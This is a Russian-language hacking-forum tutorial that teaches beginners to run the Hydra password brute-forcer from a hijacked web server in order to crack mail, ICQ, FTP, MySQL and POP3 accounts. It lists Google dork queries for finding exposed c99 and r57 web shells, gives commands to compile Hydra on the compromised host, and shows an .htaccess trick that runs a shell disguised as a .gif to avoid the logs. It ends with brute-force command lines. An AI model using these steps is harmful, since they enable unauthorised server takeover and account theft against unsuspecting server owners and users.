Сразу же хочу заметить, что статья нацелена на новичков. Очень надоело наблюдать на форуме просьбы типа сломать мэил или асю. Надеюсь, после прочтения статьи, хотя бы 20% научатся делать это сами.
Все наверно слышали о брутерах?! В принципе, не важно, кто не слышал, может дальше не читать 
Я не буду описывать здесь брутеры, их качества, плюсы, минусы и т.д. и т.п. В данной статье будет поставлена лишь одна цель, завести свою гидру без получения высоких привилегий на сервере, будет достаточно вэб-шелла.
И так, начнём, немного о гидре:
Hydra — универсальный и уникальный в своём роде брутфорсер, умеет подбирать пароли к MySQL, MSSQL, POP3, IMAP, HTTP, HTTPS, ICQ, SSH, FTP, Basic-auth и др. Имеет встроенную поддержку работы через соксы и прокси. Скачать можно здесь http://thc.org/download.php?t=r&f=hydra-5.2-src.tar.gz
Приступим, что нам потребуется:
1. Вэб-шелл на сервере с доступом к коммандному интерпритатору — 1 шт.
2. Руки 2 шт. Можно обойтись и одной, главное чтоб прямая была
Многие наверно задались вопросом об вэб-шелле, где же его взять?! Да, вопрос специфичный, а ответ в свою очередь довольно таки простой — взломать и залить. «Я же новичок?!» подумали сейчас многие! Не спорю, я тоже
Теперь всё-таки немного придется отойти от нашей намеченной цели. Найдём себе вэб-шелл! Есть один простой, но проверенный способ, набираем в адресной строке браузера google.com, там в свою очередь в поисковой строке вбиваем, что-то типо:
intitle:c99madshell uname filetype:php
intext:c99shell intitle:c99shell
intext:edited by crazydaned
intext:safe-mode: off (not secure)
intitle: — c99madshell
inanchor:c99shell filetype:php
allintext: uid=() gid=() groups=()safe-mode: off (not secure
intitle:c99madshell uname
(intitle:locus7shell | intitle:r57shell) uname
intitle:r57shell intext:uname
safe-mode: off (no secure)
safe-mode: off (not secure) c99shell
Или подобные «нехитрые» запросы,и получим лист вэб-шеллов проиндексированных поисковиком. Кому не нравится такой способ, доставайте вэб-шеллы сами
И так, предположим, что шелл нашли. Смотрим Safe-mode: OFF, это хорошо, один из главных критериев, если наоборот то ищем другой, так же узнаём юзера коммандой id и смотрим /etc/passwd, есть ли доступ к /bin/bash, или к другому интерпритатору комманд, иначе мы не сможем выполнять нужные нам действия. Теперь нужно найти каталог на запись. Немного поковыряв, найдите каталог доступный на запись, и залейте в него архив с гидрой.
Залили? Ок, хорошо. Теперь распаковываем и устанавливаем, чтоб не приходилось выполнять команды отдельно их можно объединить через ;, вбиваем в шелле tar zxf hydra-5.2-src.tar.gz;cd hydra-5.2-src;./configure;make, жмём кнопочку Execute. Смотрим в окне, должен появиться лог выполнения команд, если лога нету, значит у юзера не хватает прав на выполнение. Если всё гуд, далее переходим в каталог hydra-5.2-src. Запускаем гидру, вбиваем ./hydra и любуемся выполнением нашей гидры
И так, теперь стоит подумать немного о безопасности, под ней я имею ввиду — не палить в логах частое обращение к вэб-шеллу, где лежит гидра. А сделаем это мы весьма хитрым образом В первую очередь переименовываем каталог hydra-5.2-src во что-нибудь менее палевное, к примеру, images, вбиваем в командной строке cd ..;mv hydra-5.2-src images. Дальше переходим в переименованный каталог и создаём там файл .htaccess с содержимым:
AddType application/x-httpd-php .gif
Вот теперь зальём наш шелл в этот же каталог уже с расширением .gif и пробуем открыть его, ну как?) В принципе расширение можете выбрать на своё усмотрение, им может стать как .pdf .rar .bmp и с таким же успехом .avi При желании можем даже запаролить этот каталог, сделать доступ по IP и много чего другого, но об этом я писать не буду, т.к. это тема отдельной статьи, да и смысла писать про это нет, читаем ман по Apache Спешу предупредить, что сервер должен поддерживать .htaccess, иначе наш шелл работать не будет и есть вероятность того что нас спалят по логам =
Теперь переходим к самой приятной части. Качаем хорошие словарики для брута, коих сейчас полно, советую лишь одно — использовать встроенные качалки сервера (наличие таковых узнаём при помощи команды which curl wget get lynx fetch и т.п.), т.к. заливать большие словари со своей тачки будет очень долго.
Манов и видео по использованию данного брутфорсера много, любимый гугл в помощь, но все же пару полезных конструкций приведу:
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 ftp
./hydra -l ftpuser -p ftppass www.site.com -t 255 ftp
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 mysql
./hydra -L logins.txt -P passwords.txt pop.site.com -t 255 pop3
Единственное что хотелось бы выделить, при каждом новом задании лучше сохранять всё в лог опцией -o, либо ставить вывод в файл знаком > (К примеру ./hydra -l hacker -p pass target.com ftp >logfile.txt). Этим самым облегчим себе работу, т.к. не придёться ждать полного выполнения команды, чтоб лицезреть результат, а просто периодически будем мониторить файлик logfile.txt И напоследок хочется сказать, что в данной чудо проге мы можем указывать количество потоков от 1 до 255, и, как правило, часто бывает полезным не напрягать серв на полную катушку В принципе, у меня — всё, начинаем брутить.